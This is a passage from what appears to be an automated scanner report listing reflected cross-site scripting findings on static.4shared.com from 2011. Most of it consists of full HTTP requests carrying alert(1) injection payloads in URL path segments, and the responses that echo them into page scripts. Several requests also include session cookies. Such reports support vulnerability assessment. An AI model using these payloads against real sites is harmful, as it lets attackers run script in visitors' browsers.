Content-Length: 36150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js/index.js93e21"-alert(1)-"78ca177c741";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.189. http://static.4shared.com/js/index.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/js/index.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94291'-alert(1)-'3e235393288 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/index.js94291'-alert(1)-'3e235393288?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/index.js94291'-alert(1)-'3e235393288
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2520C9F77C881D18D6B799BEEC228348.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:57 GMT
Content-Length: 36150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/js/index.js94291'-alert(1)-'3e235393288',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.190. http://static.4shared.com/js/jquery-1.4.4.min.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/js/jquery-1.4.4.min.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41e7d"-alert(1)-"6b8c1a3bc02 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js41e7d"-alert(1)-"6b8c1a3bc02/jquery-1.4.4.min.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js41e7d"-alert(1)-"6b8c1a3bc02/jquery-1.4.4.min.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=27959477059AB3FDE308F3E82A184D47.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:54 GMT
Content-Length: 36205

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js41e7d"-alert(1)-"6b8c1a3bc02/jquery-1.4.4.min.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedbac
...[SNIP]...

1.191. http://static.4shared.com/js/jquery-1.4.4.min.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/js/jquery-1.4.4.min.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22247'-alert(1)-'5523ccfb8e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js22247'-alert(1)-'5523ccfb8e2/jquery-1.4.4.min.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js22247'-alert(1)-'5523ccfb8e2/jquery-1.4.4.min.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3C91DF5A14DFC548E163FA6873213913.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:55 GMT
Content-Length: 36194

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/js22247'-alert(1)-'5523ccfb8e2/jquery-1.4.4.min.js',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
...[SNIP]...

1.192. http://static.4shared.com/js/jquery-1.4.4.min.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/js/jquery-1.4.4.min.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2749"-alert(1)-"ee01858fec6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/jquery-1.4.4.min.jsa2749"-alert(1)-"ee01858fec6?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/jquery-1.4.4.min.jsa2749"-alert(1)-"ee01858fec6
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=645AD265F2FDE7DEF72BC64223084E6E.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:57 GMT
Content-Length: 36194

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js/jquery-1.4.4.min.jsa2749"-alert(1)-"ee01858fec6";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.193. http://static.4shared.com/js/jquery-1.4.4.min.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/js/jquery-1.4.4.min.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8da2a'-alert(1)-'247e5f6e609 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/jquery-1.4.4.min.js8da2a'-alert(1)-'247e5f6e609?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/jquery-1.4.4.min.js8da2a'-alert(1)-'247e5f6e609
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C5A70959F3D033014CD36330AC86EA92.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:59 GMT
Content-Length: 36194

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
= 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/js/jquery-1.4.4.min.js8da2a'-alert(1)-'247e5f6e609',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.194. http://static.4shared.com/js/login_fnc.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/js/login_fnc.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52e03'-alert(1)-'8fbec770bff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js52e03'-alert(1)-'8fbec770bff/login_fnc.js?ver=1611 HTTP/1.1
Host: static.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=931F171FB37FF20EDA0F3732F02AE2BB.dc293; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=559849480; df=""; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __qca=P0-1133200866-1297862349616; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; adu=""; dirPwdVerified="";

Response

HTTP/1.1 404 /js52e03'-alert(1)-'8fbec770bff/login_fnc.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2D9A787AEABE5B4F8F7F002ECED751D8.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:08:34 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/js52e03'-alert(1)-'8fbec770bff/login_fnc.js',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

...[SNIP]...

1.195. http://static.4shared.com/js/login_fnc.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/js/login_fnc.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcd0d"-alert(1)-"c510e79c899 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsdcd0d"-alert(1)-"c510e79c899/login_fnc.js?ver=1611 HTTP/1.1
Host: static.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=931F171FB37FF20EDA0F3732F02AE2BB.dc293; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=559849480; df=""; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __qca=P0-1133200866-1297862349616; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; adu=""; dirPwdVerified="";

Response

HTTP/1.1 404 /jsdcd0d"-alert(1)-"c510e79c899/login_fnc.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1B8B1596CCAE89B1C7DAED6AB2D79C1E.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:08:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/jsdcd0d"-alert(1)-"c510e79c899/login_fnc.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.196. http://static.4shared.com/js/login_fnc.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/js/login_fnc.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e5a2'-alert(1)-'8bc82dbbd88 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/login_fnc.js5e5a2'-alert(1)-'8bc82dbbd88?ver=1611 HTTP/1.1
Host: static.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=931F171FB37FF20EDA0F3732F02AE2BB.dc293; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=559849480; df=""; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __qca=P0-1133200866-1297862349616; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; adu=""; dirPwdVerified="";

Response

HTTP/1.1 404 /js/login_fnc.js5e5a2'-alert(1)-'8bc82dbbd88
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F7F7D6A96142B9AF27744AF13C5E14D6.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:08:43 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
inBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/js/login_fnc.js5e5a2'-alert(1)-'8bc82dbbd88',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.197. http://static.4shared.com/js/login_fnc.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/js/login_fnc.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbfde"-alert(1)-"8729de527e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/login_fnc.jsdbfde"-alert(1)-"8729de527e7?ver=1611 HTTP/1.1
Host: static.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=931F171FB37FF20EDA0F3732F02AE2BB.dc293; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=559849480; df=""; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __qca=P0-1133200866-1297862349616; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; adu=""; dirPwdVerified="";

Response

HTTP/1.1 404 /js/login_fnc.jsdbfde"-alert(1)-"8729de527e7
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4B8B80CCAEE7DF3FF35B41734250E503.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:08:41 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js/login_fnc.jsdbfde"-alert(1)-"8729de527e7";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.198. http://static.4shared.com/js/plugins/jquery.openid.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/js/plugins/jquery.openid.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b36e"-alert(1)-"a65e025b9c0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js2b36e"-alert(1)-"a65e025b9c0/plugins/jquery.openid.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js2b36e"-alert(1)-"a65e025b9c0/plugins/jquery.openid.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4079419CE468B6201E564B4D4B0AFC13.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:54 GMT
Content-Length: 36230

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js2b36e"-alert(1)-"a65e025b9c0/plugins/jquery.openid.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function fe
...[SNIP]...

1.199. http://static.4shared.com/js/plugins/jquery.openid.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/js/plugins/jquery.openid.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54c52'-alert(1)-'11644ab71fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js54c52'-alert(1)-'11644ab71fd/plugins/jquery.openid.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js54c52'-alert(1)-'11644ab71fd/plugins/jquery.openid.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3AF2AA52FF01165DD6733A99F2F45F39.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:55 GMT
Content-Length: 36219

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/js54c52'-alert(1)-'11644ab71fd/plugins/jquery.openid.js',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();

...[SNIP]...

1.200. http://static.4shared.com/js/plugins/jquery.openid.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/js/plugins/jquery.openid.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 938f0"-alert(1)-"0ba47aec0e3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/plugins938f0"-alert(1)-"0ba47aec0e3/jquery.openid.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/plugins938f0"-alert(1)-"0ba47aec0e3/jquery.openid.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=98C9E08BA66033E05F22FEFFAB2D92E6.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:00 GMT
Content-Length: 36230

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js/plugins938f0"-alert(1)-"0ba47aec0e3/jquery.openid.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback()
...[SNIP]...

1.201. http://static.4shared.com/js/plugins/jquery.openid.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/js/plugins/jquery.openid.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36af8'-alert(1)-'75b16a4fbc0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/plugins36af8'-alert(1)-'75b16a4fbc0/jquery.openid.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/plugins36af8'-alert(1)-'75b16a4fbc0/jquery.openid.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1023A5E166BD273CCF252B1ACE09472C.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:01 GMT
Content-Length: 36230

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
f loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/js/plugins36af8'-alert(1)-'75b16a4fbc0/jquery.openid.js',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}

...[SNIP]...

1.202. http://static.4shared.com/js/plugins/jquery.openid.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/js/plugins/jquery.openid.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e541a"-alert(1)-"0f1b43c7c9d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/plugins/jquery.openid.jse541a"-alert(1)-"0f1b43c7c9d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/plugins/jquery.openid.jse541a"-alert(1)-"0f1b43c7c9d
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1C143464BBA385C37A4E2F937E7C446F.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:05 GMT
Content-Length: 36219

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js/plugins/jquery.openid.jse541a"-alert(1)-"0f1b43c7c9d";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.203. http://static.4shared.com/js/plugins/jquery.openid.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/js/plugins/jquery.openid.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d15e0'-alert(1)-'bd16cc0fbb0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/plugins/jquery.openid.jsd15e0'-alert(1)-'bd16cc0fbb0 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/plugins/jquery.openid.jsd15e0'-alert(1)-'bd16cc0fbb0
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E7C0D37C15859DE296A4F6986D5F220A.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:06 GMT
Content-Length: 36219

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
defined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/js/plugins/jquery.openid.jsd15e0'-alert(1)-'bd16cc0fbb0',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.204. http://static.4shared.com/js/signup-script.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/js/signup-script.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99b90'-alert(1)-'5214ff01e8a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js99b90'-alert(1)-'5214ff01e8a/signup-script.jsp?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
